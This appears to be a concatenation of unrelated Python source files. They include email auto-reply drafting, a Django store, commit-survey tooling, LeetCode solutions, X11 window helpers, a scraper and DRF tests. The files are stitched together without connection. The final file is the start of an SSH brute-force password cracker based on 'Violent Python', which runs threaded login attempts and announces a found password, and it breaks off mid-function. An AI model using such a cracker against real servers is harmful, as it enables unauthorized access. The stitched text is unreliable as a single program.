    conn = imaplib.IMAP4_SSL('imap.gmail.com')
    conn.login(username, password)
    print("Draft Send")
    stamp = imaplib.Time2Internaldate(time.time())
    conn.append('[Gmail]/Drafts', '\Draft', stamp, str(msg).encode("utf-8"))
    conn.logout()
def string():
    """Draft reply emails for each merged (original, predicted-label) row.

    Joins the parsed mailbox dump with the classifier output on Subject,
    then drafts a canned HTML reply per row depending on the label and on
    the ``thirdperson`` / ``connect`` / ``detail`` content checks.

    NOTE(review): indentation reconstructed from a flattened dump; in some
    branches ``messagebody`` may be referenced without having been
    assigned (e.g. when the inner ``if name:`` guards fail) -- confirm.
    """
    loaded = pd.read_csv("fromjson.csv", engine='python')
    check = pd.read_csv("predictedresult.csv")
    # Inner join: only subjects present in both files are processed.
    mergedStuff = pd.merge(loaded, check, on=['Subject'], how='inner')
    for i in mergedStuff.index:
        # Name of the counterpart, pulled from the original message body.
        name = fetchname(mergedStuff['text/plain_x'][i])
        if mergedStuff['Label'][i] == 1:
            # Positive reply: pick a template by what the body asks for.
            if thirdperson(mergedStuff["text/plain_y"][i]):
                checkcc, name1 = thirdperson(mergedStuff["text/plain_y"][i])
                if checkcc == 1:
                    if name:
                        if name1:
                            message = 'Hi ', name,",","""<pre><br>Thanks for connecting us with the team. <br><br>Hi """, name1, """ ,<br><br>Happy to e-meet you. <br><br>Do let me know when we can connect over a call. Here is a link to my calendar.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 """
                            messagebody = ''.join(message)
                elif checkcc == 2:
                    if name:
                        message = 'Hi ', name1 ,",","""<pre><br>Happy to e-meet you. <br><br>Do let me know when we can connect over a call.<br><br>Here is a link to my calendar for a meeting at a convenient time of yours.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 """
                        messagebody = ''.join(message)
                toaddr = mergedStuff["From_y"][i]
                cc = ccvalue
                fromaddr = mergedStuff["To_y"][i]
                subject = mergedStuff["Subject"][i]
                draft(fromaddr, toaddr, messagebody, cc, subject)
            elif connect(mergedStuff["text/plain_y"][i]):
                number, email, name1, date = connect(mergedStuff["text/plain_y"][i])
                if date == 1:
                    if name:
                        # mark calender
                        message = 'Hi ', name,",","""<pre><br><br>Thanks for your response.<br><br>Surely, I will connect with you for a brief meeting. <br><br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br><br>+91 9930459453</pre>"""
                        messagebody = ''.join(message)
                elif date == 2:
                    if name:
                        message = 'Hi ', name,",","""<pre><br>Thanks for your response.<br><br>Please select a convenient meeting time by clicking the below calendar link.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 </pre>"""
                        messagebody = ''.join(message)
                elif date == 3:
                    if name:
                        message = 'Hi ', name,",","""<pre><br>Thanks for your response.<br><br>Please select a convenient meeting time by clicking the below calendar link.<br><br><a href="https://calendly.com/i-am-the-red-tomato/15min">My Calender Link</a><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 </pre>"""
                        messagebody = ''.join(message)
                fromaddr = mergedStuff["To_y"][i]
                toaddr = mergedStuff["From_y"][i]
                cc = ccvalue
                subject = mergedStuff["Subject"][i]
                draft(fromaddr, toaddr, messagebody, cc, subject)
            elif detail(mergedStuff["text/plain_y"][i]):
                message = 'Hi ',name,",","""<pre><br>Thanks for your response. <br><br>Enclosed is a brief presentation about our company and solutions offering.<br><br>Happy to connect with you at a time convenient of yours to discuss a solution fitment.<br><br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 """
                messagebody = ''.join(message)
                fromaddr = mergedStuff["To_y"][i]
                toaddr = mergedStuff["From_y"][i]
                cc = ccvalue
                subject = mergedStuff["Subject"][i]
                draft(fromaddr, toaddr, messagebody, cc, subject)
        elif mergedStuff['Label'][i] == 0:
            # Negative reply: polite decline acknowledgement.
            if name:
                message = 'Hi ', name,",","""<pre><br>Surely, noted.<br><br>Feel free to connect with us in the future if you would like to explore our offerings.<br><br>Best,<br>Rekha Jain <br>Founder <br>www.jetleads.io <br>+91 9930459453 </pre>"""
                messagebody = ''.join(message)
                fromaddr = mergedStuff["To_y"][i]
                toaddr = mergedStuff["From_y"][i]
                cc = ccvalue
                subject = mergedStuff["Subject"][i]
                draft(fromaddr, toaddr,messagebody, cc, subject)
|
from django.shortcuts import render, HttpResponse, redirect
def index(request):
    """Render the store page, initialising session totals on first visit.

    Python 2 view (print statements).
    """
    print "-----in the INDEX ROUTE------------"
    try:
        # Touch both keys; a KeyError on either means a fresh session.
        request.session['total_spent']
        request.session['items_bought']
    except:
        request.session['total_spent'] = 0
        request.session['items_bought'] = 0
    print type(request.session['items_bought'])
    return render(request, 'amadon/index.html')
def process(request, methods='POST'):
    """Handle a purchase POST: add quantity * unit price to the session
    totals, then redirect to the receipt page. Python 2 view.

    NOTE(review): ``methods='POST'`` is an ordinary default argument here,
    not an HTTP-method restriction -- confirm intent.
    """
    print "-----------in the PROCESS ROUTE-----------"
    # Session values round-trip as strings; normalise before arithmetic.
    request.session['items_bought']=int(request.session['items_bought'])
    print type(request.session['items_bought'])
    product_id = int(request.POST['product_id'])
    if product_id== 1:
        request.session['quantity'] = request.POST['quantity']
        product = "Dojo Cup"
        request.session['total'] = int(request.session['quantity']) * 4.99
        request.session['total_spent'] += float(request.session['total'])
        request.session['items_bought'] += int(request.session['quantity'])
        print type(request.session['items_bought']), "<----------look at this--------"
    elif product_id == 2:
        request.session['quantity'] = request.POST['quantity']
        product = "Dojo T-Shirt"
        request.session['total'] = int(request.session['quantity']) * 19.99
        request.session['total_spent'] += float(request.session['total'])
        request.session['items_bought'] += int(request.session['quantity'])
    elif product_id == 3:
        request.session['quantity'] = request.POST['quantity']
        product = "Dojo Sweater"
        request.session['total'] = int(request.session['quantity']) * 29.99
        request.session['total_spent'] += float(request.session['total'])
        request.session['items_bought'] += int(request.session['quantity'])
    else:
        # Any other id falls through to the book.
        request.session['quantity'] = request.POST['quantity']
        product = "Algorithm Book"
        request.session['total'] = int(request.session['quantity']) * 49.99
        request.session['total_spent'] += float(request.session['total'])
        request.session['items_bought'] += int(request.session['quantity'])
    return redirect('/amadon/buy')
def buy(request):
    """Render the checkout/receipt page. Python 2 view."""
    print "---------in the BUY ROUTE--------------"
    return render(request, 'amadon/buy.html')
|
#!/usr/bin/env python3.6
import argparse
import git
import random
import re
import sys
import database
# Commit hashes eligible for comparison, and the comparisons collected
# per reviewer email (filled elsewhere, consumed by the check_* helpers).
check_commit_pool = set()
check_email2comparisons = dict()


def check_comparison_id(commit1, commit2):
    """Return an order-independent identifier for a pair of commits."""
    assert commit1 != commit2
    if commit1 < commit2:
        return commit1 + commit2
    return commit2 + commit1


# A comparison structure is a list that consists of the author email,
# the first commit hash, and the second commit hash.
def check_one_author(email, comparisons, n, m):
    """Validate one author's assignment: at most n comparisons of their own
    commits and exactly m comparisons of other authors' commits.

    Each comparison is [author_email, commit1_hash, commit2_hash].
    """
    own_ids = set()
    other_ids = set()
    for author_email, c1, c2 in comparisons:
        assert c1 in check_commit_pool and c2 in check_commit_pool
        bucket = own_ids if author_email == email else other_ids
        bucket.add(check_comparison_id(c1, c2))
    assert len(own_ids) <= n and len(other_ids) == m
    if len(own_ids) < n:
        print('Warning: %s is assigned with %d questions, less than n.' %
              (email, len(own_ids)))
def check(n, m):
    """Run the per-author assignment validation over every recorded author."""
    for author_email, recorded in check_email2comparisons.items():
        check_one_author(author_email, recorded, n, m)
# Histogram of integer commit-size ratios: bucket i-1 counts pairs whose
# truncated ratio is i; the last bucket absorbs ratios >= max_ratio.
max_ratio = 20
ratio_buckets = [0] * max_ratio
def record_ratio(a, b):
    """Record the size ratio of two commits in the global ratio histogram."""
    ratio = int(max(a / b, b / a))
    ratio = min(ratio, max_ratio)  # clamp into the final bucket
    ratio_buckets[ratio - 1] += 1
def sum_percents():
    """Return the histogram total and each bucket as a fraction of that total."""
    total = sum(ratio_buckets)
    fractions = [count / total for count in ratio_buckets]
    return total, fractions
def compose_url(token, project_id):
    """Build the survey entry URL for a developer *token* scoped to *project_id*."""
    template = 'http://survey.persper.org/#/entry/%s?projectId=%s'
    return template % (token, project_id)
def parse_repo_url(remote_url):
    """Extract (user, repo) from a GitHub remote URL.

    Supports the SSH form git@github.com:user/repo.git and the HTTP(S) form
    with an optional .git suffix.

    :raises ValueError: if the URL matches neither form.
    """
    # BUG FIX: the dots in the host and the .git suffix were unescaped, so
    # e.g. 'github-com' or any character would match where '.' was intended.
    match = re.match(r'git@github\.com:(.+)/(.+)\.git', remote_url)
    if match is None:
        match = re.match(r'http[s]?://github\.com/(.+)/([^.]+)(?:\.git)?',
                         remote_url)
    if match is None:
        raise ValueError('Repository URL not recognized')
    return match.group(1), match.group(2)
def parse_emails(file_path):
    """Return the email address found at the start of each line of *file_path*.

    Lines that do not begin with an address are skipped; trailing text after
    the address is ignored.
    """
    pattern = re.compile(r'[\w.\-+]+@[\w.\-]+')
    with open(file_path) as handle:
        candidates = (pattern.match(line) for line in handle)
        return [found.group() for found in candidates if found]
def main():
    """Select commit pairs from a Git repo and populate the survey database.

    For each participant email, assigns up to n comparisons between the
    author's own commits plus m comparisons of other authors' commits.
    With -s only commit-size-ratio stats are printed; with -v only the
    chosen pairs are printed. After populating, adds the built-in labels.
    """
    parser = argparse.ArgumentParser(
        description='Populate a database with commits')
    parser.add_argument('-d', '--repo-dir', required=True,
                        help='dir of the repo to select commits')
    parser.add_argument('-b', '--branch', default='master',
                        help='branch of the repo to select commits')
    parser.add_argument('-l', '--min-count', type=int, default=0,
                        help='min number of commit to begin with')
    parser.add_argument('-u', '--max-count', type=int, default=sys.maxsize,
                        help='max number of commit to end with')
    parser.add_argument('-e', '--emails', nargs='+',
                        help='emails of repo developers in the survey')
    parser.add_argument('-f', '--file', help='email author list file')
    parser.add_argument('-n', type=int, required=True,
                        help='number of self comparisons')
    parser.add_argument('-m', type=int, default=0,
                        help="number of comparisons of others' commits")
    parser.add_argument('-s', '--stats', action='store_true',
                        help='show stats of chosen commits, '
                             'without populating the database')
    parser.add_argument('-v', '--verify', action='store_true',
                        help='print out commits for verification '
                             'without populating the database')
    parser.add_argument('-r', '--ratio', type=int, default=sys.maxsize,
                        help='max ratio of commit sizes in a comparision')
    args = parser.parse_args()
    # Participant emails come from -e and/or the -f file.
    emails = args.emails if args.emails else []
    emails += parse_emails(args.file) if args.file else []
    if len(emails) < 1:
        sys.exit('Please specify emails by -e or -f. See help info by -h.')
    # NOTE(review): 'and' binds tighter than 'or', so this reads
    # (m > 0 and no emails) or n < 2; the empty-emails case already exited
    # above, leaving only the n < 2 check effective -- confirm intent.
    if args.m > 0 and len(emails) < 1 or args.n < 2:
        sys.exit('ERR: Cannot meet the requirement of m.')
    if args.m > args.n and args.n % (len(emails) - 1) == 0:
        sys.exit('ERR: The current algorithm does not support such n and m. '
                 'Increase/decrease n by 1 or increase the number of emails.')
    if args.m > args.n * (len(emails) - 1):
        sys.exit('ERR: Cannot meet the requirement of m. Increase n.')
    repo = git.Repo(args.repo_dir)
    github_url = repo.remotes.origin.url
    user_name, repo_name = parse_repo_url(github_url)
    project_name = '%s-%s' % (user_name, repo_name)
    # Placeholder id used in the dry-run (-s / -v) modes.
    project_id = "[Project ID]"
    if not args.stats and not args.verify:
        project_id = database.add_project(project_name, github_url)
    # Group non-merge commits of the selected range by author email.
    email2commits = dict()
    for commit in repo.iter_commits(args.branch, max_count=args.max_count,
                                    skip=args.min_count):
        if len(commit.parents) > 1:
            continue
        email = commit.author.email.lower()
        if email not in email2commits:
            email2commits[email] = [commit]
        else:
            email2commits[email].append(commit)
    for e, author in enumerate(emails):
        if not args.stats and not args.verify:
            token = database.get_developer_token(author)
            if token is None:
                token = database.add_developer(author.split('@')[0], author)
            print(author, compose_url(token, project_id))
        # Phase 1: up to n comparisons among the author's own commits.
        # NOTE(review): this loop can spin forever when the author has too
        # few distinct commits with nonzero line counts -- confirm inputs.
        n_added = 0
        selected = []
        while n_added < args.n:
            selected = random.sample(email2commits[author],
                                     min(args.n * 2, len(email2commits[author])))
            selected = sorted(selected, key=lambda x: x.hexsha)
            # Starting at -1 also pairs the last sample with the first.
            for i in range(-1, len(selected) - 1):
                c1 = selected[i]
                c2 = selected[i + 1]
                c1_email = c1.author.email.lower()
                c2_email = c2.author.email.lower()
                assert c1_email == c2_email
                n1 = c1.stats.total['lines']
                n2 = c2.stats.total['lines']
                if not n1 or not n2:
                    continue
                if args.stats:
                    record_ratio(n1, n2)
                elif int(max(n1 / n2, n2 / n1)) > args.ratio:
                    continue
                elif args.verify:
                    print(c1.hexsha, c2.hexsha, n1, n2,
                          '%.2f' % max(n1 / n2, n2 / n1), sep='\t')
                else:
                    database.add_commit(sha1_hex=c1.hexsha, title=c1.summary,
                                        email=c1_email, project_id=project_id)
                    database.add_commit(sha1_hex=c2.hexsha, title=c2.summary,
                                        email=c2_email, project_id=project_id)
                    database.add_comparison(c1.hexsha, c2.hexsha, author)
                # Below is for the check purpose.
                check_commit_pool.add(c1.hexsha)
                check_commit_pool.add(c2.hexsha)
                if author not in check_email2comparisons:
                    check_email2comparisons[author] = []
                check_email2comparisons[author].append(
                    [c1_email, c1.hexsha, c2.hexsha])
                n_added += 1
                if n_added >= args.n:
                    break
        # Phase 2: m comparisons of this author's sampled commits handed
        # round-robin to the other participants.
        m_added = 0
        base = e
        for i in range(-1, args.m - 1):
            # Skip over the author's own slot in the rotation.
            if emails[(base + i + 2) % len(emails)] == author:
                base = base + 1
            email = emails[(base + i + 2) % len(emails)]
            assert email != author or len(emails) == 1
            c1 = selected[i % len(selected)]
            c2 = selected[(i + 1) % len(selected)]
            assert c1.author.email.lower() == c2.author.email.lower()
            n1 = c1.stats.total['lines']
            n2 = c2.stats.total['lines']
            if not n1 or not n2:
                continue
            if args.stats:
                record_ratio(n1, n2)
            elif int(max(n1 / n2, n2 / n1)) > args.ratio:
                continue
            elif not args.verify:
                database.add_comparison(c1.hexsha, c2.hexsha, email)
            # Below is for the check purpose.
            if email not in check_email2comparisons:
                check_email2comparisons[email] = []
            check_email2comparisons[email].append(
                [c1.author.email.lower(), c1.hexsha, c2.hexsha])
            m_added += 1
            if m_added >= args.m:
                break
    if args.stats:
        s, d = sum_percents()
        print('Total number of commits:', s)
        for i, p in enumerate(d):
            print('%dx=%.1f%%' % (i + 1, p * 100), end=', ')
        print()
    elif not args.verify:
        # Cross-check the generated assignment before finishing.
        check(args.n, args.m)
        # Add builtin labels
        reviewer = database.add_reviewer('jinglei@persper.org')
        database.add_label('tiny', 'Builtin', reviewer)
        database.add_label('small', 'Builtin', reviewer)
        database.add_label('moderate', 'Builtin', reviewer)
        database.add_label('large', 'Builtin', reviewer)
        database.add_label('huge', 'Builtin', reviewer)
# Script entry point.
if __name__ == '__main__':
    main()
|
#python3
'''
Given a binary array, find the maximum number of consecutive 1s in this array.
Example 1:
Input: [1,1,0,1,1,1]
Output: 3
Explanation: The first two digits or the last three digits are consecutive 1s.
The maximum number of consecutive 1s is 3.
Note:
The input array will only contain 0 and 1.
The length of input array is a positive integer and will not exceed 10,000
'''
def findMaxConsecutiveOnes(nums):
    """Return the length of the longest run of consecutive 1s in *nums*.

    Single O(n) pass replacing the original zero-index bookkeeping; behaves
    identically on all valid inputs (including all-zero, all-one and empty
    lists).
    """
    best = 0
    current = 0
    for num in nums:
        if num == 1:
            current += 1
            if current > best:
                best = current
        else:
            current = 0  # run broken by a zero
    return best
if __name__ == '__main__':
    # Quick self-checks from the problem statement.
    print(findMaxConsecutiveOnes([1,1,0,1,1,1]))
    print(findMaxConsecutiveOnes([1,0,1,1,0,1]))
import textgenrnn as tgr
# Train a fresh bidirectional char-RNN on the UFO corpus, then sample from it.
ufo_tgr2 = tgr.textgenrnn(name='ufo_model2')
ufo_tgr2.train_from_file('training_data2.txt', new_model=True, batch_size=512, num_epochs=5, rnn_bidirectional=True, rnn_size=64)
# BUG FIX: the original referenced undefined names ('ufo_tgr' and a bare
# 'textgenrnn'); sample from the model trained above and use the module alias.
ufo_tgr2.generate_samples(temperatures=[0.35, 0.45, .55, .65, .75], return_as_list=False)
textgen = tgr.textgenrnn('../weights/hacker_news.hdf5')
|
import subprocess
import time
import os
#-----------------------------------------------------------------------
def mapstate(winid):
    """
    Return the X map state of window *winid*.

    One of 'NoWindow', 'IsUnMapped', 'IsViewable'; 'NoWindow' when xwininfo
    prints no "Map State:" line (e.g. the id does not exist).

    NOTE(review): under Python 3 the pipe yields bytes, so the comparison
    with str lists never matches -- confirm this module targets Python 2 or
    add universal_newlines=True.
    """
    pipe = subprocess.Popen('xwininfo -id "%s" 2>/dev/null' % (winid,), shell=True,
                            stdout=subprocess.PIPE).stdout
    for raw in pipe:
        fields = raw.split()
        if fields[0:2] == ['Map', 'State:']:
            return fields[2]
    return 'NoWindow'
#-----------------------------------------------------------------------
def waitfor(winid, delay=0.5):
    """Poll every *delay* seconds until window *winid* becomes viewable."""
    while mapstate(winid) != 'IsViewable':
        time.sleep(delay)
#-----------------------------------------------------------------------
def windowid(name):
    """Map a client window name to its X window id via xlsclients.

    Relies on xlsclients printing the 'Window' line before the matching
    'Name:' line. NOTE(review): only the first word of the name is compared
    -- multi-word names never match; confirm.
    """
    pipe = subprocess.Popen('xlsclients -l', shell=True,
                            stdout=subprocess.PIPE).stdout
    for raw in pipe:
        fields = raw.split()
        if fields[0] == 'Window':
            win = fields[1][:-1]  # strip the trailing ':'
        if fields[0] == 'Name:' and fields[1] == name:
            return win
    raise Exception('no window named: %s' % (name,))
#-----------------------------------------------------------------------
def windowpos(winid):
    """Return (x, y, width, height) for window *winid*.

    x/y are the frame origin: the absolute upper-left corner minus the
    window-manager border offset (relative upper-left).
    """
    pipe = subprocess.Popen('xwininfo -id %s' % (winid,), shell=True,
                            stdout=subprocess.PIPE).stdout
    for raw in pipe:
        fields = raw.split()
        if fields[0:1] == ['Width:']:
            ww = int(fields[1])
        if fields[0:1] == ['Height:']:
            hh = int(fields[1])
        if fields[0:3] == ['Absolute', 'upper-left', 'X:']:
            aulx = int(fields[3])
        if fields[0:3] == ['Absolute', 'upper-left', 'Y:']:
            auly = int(fields[3])
        if fields[0:3] == ['Relative', 'upper-left', 'X:']:
            rulx = int(fields[3])
        if fields[0:3] == ['Relative', 'upper-left', 'Y:']:
            ruly = int(fields[3])
    return (aulx - rulx, auly - ruly, ww, hh)
#-----------------------------------------------------------------------
def windowraise(winid):
    """Raise window *winid* to the top of the stacking order via xdotool."""
    os.system('xdotool windowraise %s' % (winid,))
#-----------------------------------------------------------------------
def moveto(winid, x, y):
    """Move window *winid* so its frame origin sits at (x, y)."""
    os.system('xdotool windowmove %s %d %d' % (winid, x, y))
#-----------------------------------------------------------------------
def slideto(winid, destx, desty, SLICES=25):
    """Animate window *winid* to (destx, desty) in SLICES equal steps,
    finishing with an exact move to the destination."""
    startx, starty = windowpos(winid)[0:2]
    stepx = (destx - startx) / float(SLICES)
    stepy = (desty - starty) / float(SLICES)
    for step in range(SLICES):
        os.system('xdotool windowmove %s %d %d'
                  % (winid, startx + stepx * step, starty + stepy * step))
    os.system('xdotool windowmove %s %d %d' % (winid, destx, desty))
def position(winid1, pos, winid2, func):
    """Place winid1 adjacent to winid2 and move it there with *func*.

    pos is one of 'topof', 'bottomof', 'leftof', 'rightof'; func is a mover
    such as moveto or slideto. An unknown pos raises NameError, as before.
    """
    macoffset = 22  # vertical allowance for the title bar -- TODO confirm value
    x1, y1, w1, h1 = windowpos(winid1)
    x2, y2, w2, h2 = windowpos(winid2)
    if pos == 'topof':
        nx = x2
        ny = y2 - h1 - macoffset
    elif pos == 'bottomof':
        nx = x2
        ny = y2 + h2 + macoffset
    elif pos == 'leftof':
        nx = x2 - w1
        ny = y2
    elif pos == 'rightof':
        nx = x2 + w2
        ny = y2
    func(winid1, nx, ny)
|
from plugins import BotPlugin
import re
class LetMeGoogleThatForYou(BotPlugin):
    """Bot plugin answering 'google <query>' with a Google search link."""
    TRIGGER = "google"

    def exec_plugin(self, command):
        """Return the search link for the text after 'google', or None."""
        match = re.match(r'google\s*(.+)$', command)
        if not match:
            return None
        query = match.group(1).replace(' ', '+')
        return "Let me google that for you: https://google.com/#q={}".format(query)
|
# -*- coding: utf-8 -*-
# @Time : 2021/4/22 3:10 下午
# @Author : AI悦创
# @FileName: Spider.py
# @Software: PyCharm
# @Blog :http://www.aiyc.top
# @公众号 :AI悦创
import requests
import cchardet
import traceback
import re
from bs4 import BeautifulSoup
import csv
def downloader(url, timeout=10, headers=None, debug=False, binary=False):
    """Fetch *url* and return (status, html, redirected_url).

    On any download/decoding failure, status is 0 and html is empty
    ('' or b'' depending on *binary*). With binary=True the raw bytes are
    returned; otherwise the body is decoded with the cchardet-detected
    encoding. Custom *headers* replace the default User-Agent entirely.
    """
    _headers = {
        'User-Agent': ('Mozilla/5.0 (compatible; MSIE 9.0; '
                       'Windows NT 6.1; Win64; x64; Trident/5.0)'),
    }
    redirected_url = url
    if headers:
        _headers = headers
    try:
        r = requests.get(url, headers=_headers, timeout=timeout)
        if binary:
            html = r.content
        else:
            encoding = cchardet.detect(r.content)['encoding']
            html = r.content.decode(encoding)
        status = r.status_code
        redirected_url = r.url
    # BUG FIX: narrowed from a bare 'except:' which also swallowed
    # KeyboardInterrupt/SystemExit; still best-effort for real errors.
    except Exception:
        if debug:
            traceback.print_exc()
        msg = 'failed download: {}'.format(url)
        print(msg)
        if binary:
            html = b''
        else:
            html = ''
        status = 0
    return status, html, redirected_url
# def write_csv(data):
# with open("stocks.csv", "a+")as f:
# f_csv = csv.writer(f)
# f_csv.writerow(data)
def write_dict_csv(data):
    """Append *data* (a list of row dicts) to stocks.csv in gbk encoding.

    BUG FIX: the file is opened in append mode, but the original wrote the
    header row on every call, producing duplicated headers. The header is
    now written only when the file is new or empty. newline='' is passed so
    the csv module controls line endings, avoiding blank rows on Windows.
    """
    import os  # local import: top-of-file imports are outside this block
    headers = ['ranking', 'region', 'permanent_resident_population', 'area', 'link']
    need_header = (not os.path.exists("stocks.csv")
                   or os.path.getsize("stocks.csv") == 0)
    with open("stocks.csv", "a+", encoding='gbk', newline='') as f:
        f_csv = csv.DictWriter(f, headers)
        if need_header:
            f_csv.writeheader()
        f_csv.writerows(data)
def parse(html):
    """Yield one dict per usable row of the population ranking table."""
    soup = BeautifulSoup(html, "lxml")
    rows = soup.select("#tablepress-48 .row-hover .even")
    for row in rows:
        # Column meanings:
        #   column-1: ranking, column-2: region,
        #   column-3: permanent resident population, column-4: area
        ranking = row.select(".even .column-1")
        region = row.select(".even .column-2")
        permanent_resident_population = row.select(".even .column-3")
        area = row.select(".even .column-4")
        # Skip rows missing any of the four columns.
        if ranking and region and permanent_resident_population and area:
            yield {
                "ranking": ranking[0].string,
                "region": region[0].string,
                "permanent_resident_population": permanent_resident_population[0].string,
                "area": area[0].string,
            }
if __name__ == '__main__':
    # Scrape the county-level population ranking page and dump it to CSV.
    url = 'https://www.hongheiku.com/category/xianjirank'
    s, html, lost_url = downloader(url)
    # print(s, html, lost_url)
    # print(list(parse(html)))
    data = list(parse(html))
    # for item in parse(html):
    #     print(item)
    write_dict_csv(data)
|
from .wauchier import WauchierAllowedPOS, WauchierAllowedLemma, WauchierTokens, Wauchier
from .floovant import FloovantTokens, FloovantAllowedPOS, FloovantAllowedLemma, Floovant
import copy
import time
# Registry of test corpora keyed by name; each entry bundles the corpus
# fixture plus its token/lemma/POS fixture lists consumed by add_corpus().
# "morph" is currently empty for both corpora.
DB_CORPORA = {
    "wauchier": {
        "corpus": Wauchier,
        "tokens": WauchierTokens,
        "lemma": WauchierAllowedLemma,
        "POS": WauchierAllowedPOS,
        "morph": []
    },
    "floovant": {
        "corpus": Floovant,
        "tokens": FloovantTokens,
        "lemma": FloovantAllowedLemma,
        "POS": FloovantAllowedPOS,
        "morph": []
    }
}
def add_corpus(
        corpus, db, with_token=True, tokens_up_to=None,
        with_allowed_lemma=False, partial_allowed_lemma=False,
        with_allowed_pos=False, partial_allowed_pos=False
):
    """ Add a registered corpus (key of DB_CORPORA) to fixtures

    :param corpus: Name of the corpus in DB_CORPORA ("wauchier" or "floovant")
    :param db: Database object
    :param with_token: Add tokens as well
    :param tokens_up_to: When not None, only add the first N tokens
    :param with_allowed_lemma: Add allowed lemma to db
    :param partial_allowed_lemma: Restrict to first three allowed lemma (de saint martin)
    :param with_allowed_pos: Add allowed POS to db
    :param partial_allowed_pos: Restrict to first three allowed POS (ADJqua, NOMpro, CONcoo)
    """
    # Deep copies keep the shared fixture objects free of session state
    # across repeated test setups.
    db.session.add(copy.deepcopy(DB_CORPORA[corpus]["corpus"]))
    db.session.commit()
    add = []
    if with_token is True:
        if tokens_up_to is not None:
            add += DB_CORPORA[corpus]["tokens"][:tokens_up_to]
        else:
            add += DB_CORPORA[corpus]["tokens"]
    if with_allowed_lemma is True:
        if partial_allowed_lemma:
            add += DB_CORPORA[corpus]["lemma"][:3]
        else:
            add += DB_CORPORA[corpus]["lemma"]
    if with_allowed_pos is True:
        if partial_allowed_pos:
            add += DB_CORPORA[corpus]["POS"][:3]
        else:
            add += DB_CORPORA[corpus]["POS"]
    for x in add:
        db.session.add(copy.deepcopy(x))
    db.session.commit()
    # Pause between fixture loads -- presumably to let the DB settle;
    # TODO confirm this sleep is still required.
    time.sleep(1)
|
# -*- coding: utf-8 -*-
"""
@Time : 2020/8/15 10:06
@Author : QDY
@FileName: 546. 移除盒子.py
@Software: PyCharm
"""
"""
给出一些不同颜色的盒子,盒子的颜色由数字表示,即不同的数字表示不同的颜色。
你将经过若干轮操作去去掉盒子,直到所有的盒子都去掉为止。
每一轮你可以移除具有相同颜色的连续 k 个盒子(k>= 1),这样一轮之后你将得到 k*k 个积分。
当你将所有盒子都去掉之后,求你能获得的最大积分和。
示例:
输入:boxes = [1,3,2,2,2,3,4,3,1]
输出:23
解释:
[1, 3, 2, 2, 2, 3, 4, 3, 1]
----> [1, 3, 3, 4, 3, 1] (3*3=9 分)
----> [1, 3, 3, 3, 1] (1*1=1 分)
----> [1, 1] (3*3=9 分)
----> [] (2*2=4 分)
提示:
1 <= boxes.length <= 100
1 <= boxes[i]<= 100
"""
from functools import lru_cache
class Solution:
    def removeBoxes(self, boxes) -> int:
        """LeetCode 546: maximum score obtainable by repeatedly removing runs
        of equal-colored boxes (a run of k boxes scores k*k).

        helper(l, r, k) = best score for boxes[l:r+1] with k extra copies of
        boxes[r] already attached to its right.
        """
        @lru_cache(None)
        def helper(l, r, k):
            if l > r:
                return 0
            # Fold trailing duplicates of boxes[r] into k.
            # BUG FIX: the guard must be r > l (not r > 1); with r > 1 the
            # merge could step below l and credit a box outside [l, r]
            # (e.g. helper(1, 1, 0) on [7, 7, 9, 7] scored the box at
            # index 0 a second time).
            while r > l and boxes[r] == boxes[r - 1]:
                r -= 1
                k += 1
            # Option 1: remove the trailing run (k + 1 boxes) immediately.
            res = helper(l, r - 1, 0) + (k + 1) ** 2
            # Option 2: defer it -- join boxes[r] with an earlier equal box
            # at i, solving the gap boxes[i+1:r] independently.
            for i in range(l, r):
                if boxes[i] == boxes[r]:
                    res = max(res, helper(l, i, k + 1) + helper(i + 1, r - 1, 0))
            return res

        return helper(0, len(boxes) - 1, 0)
|
from rest_framework import status
from rest_framework.authtoken.models import Token
from rest_framework.reverse import reverse
from rest_framework.test import APIClient, APITransactionTestCase
from tests.factories.user import UserFactory
class CreateTokenForUserTest(APITransactionTestCase):
    """Auth-token endpoint tests: token creation with valid, missing and
    invalid credentials."""
    client = APIClient()
    def setUp(self):
        # The factory stores a raw password attribute; hash it properly so a
        # login with the plain-text value succeeds.
        self.user = UserFactory(password="Asdf123!")
        self.user.set_password(self.user.password)
        self.user.save()
        self.payload = {
            "username": self.user.username,
            "password": "Asdf123!",
        }
        # After save(), self.user.password holds the *hashed* value, so this
        # payload is deliberately invalid.
        self.invalid_payload = {
            "username": self.user.username,
            "password": self.user.password,
        }
    def test_create_token_successful(self):
        # Valid credentials: 200 with the persisted token key in the body.
        response = self.client.post(reverse("auth-token"), data=self.payload)
        assert response.status_code == status.HTTP_200_OK
        assert "token" in response.json()
        assert response.json()["token"] == Token.objects.first().key
    def test_create_token_without_user(self):
        # Empty body: both fields reported as required.
        response = self.client.post(reverse("auth-token"))
        assert response.status_code == status.HTTP_400_BAD_REQUEST
        assert response.json()["username"] == ["This field is required."]
        assert response.json()["password"] == ["This field is required."]
    def test_create_token_with_invalid_credentials(self):
        # Wrong password: generic non-field error, no token issued.
        response = self.client.post(reverse("auth-token"), data=self.invalid_payload)
        assert response.status_code == status.HTTP_400_BAD_REQUEST
        assert response.json()["non_field_errors"] == ["Unable to log in with provided credentials."]
|
#
#
# SSH brutforce cracker, based on project frome 'Violent Python'
# by TJ O'Connor
#
import pxssh
import time
from threading import *
# Throttle concurrent SSH attempts with a bounded semaphore; Found/Fails are
# shared (unsynchronized) state mutated by the worker threads.
maxConnections = 5
connection_lock = BoundedSemaphore(value = maxConnections)
Found = False
Fails = 0
def conn(host, user, password, release):
    # Try one SSH login (Python 2 / pxssh). On transient pxssh errors the
    # attempt retries recursively after a pause, with release=False so the
    # semaphore is released exactly once by the outermost call's finally.
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print "Password found !!!: " + password
        Found = True
    except Exception, e:
        if "read_nonblocking" in str(e):
            # Socket timeout: count it, back off and retry.
            Fails += 1
            time.sleep(5)
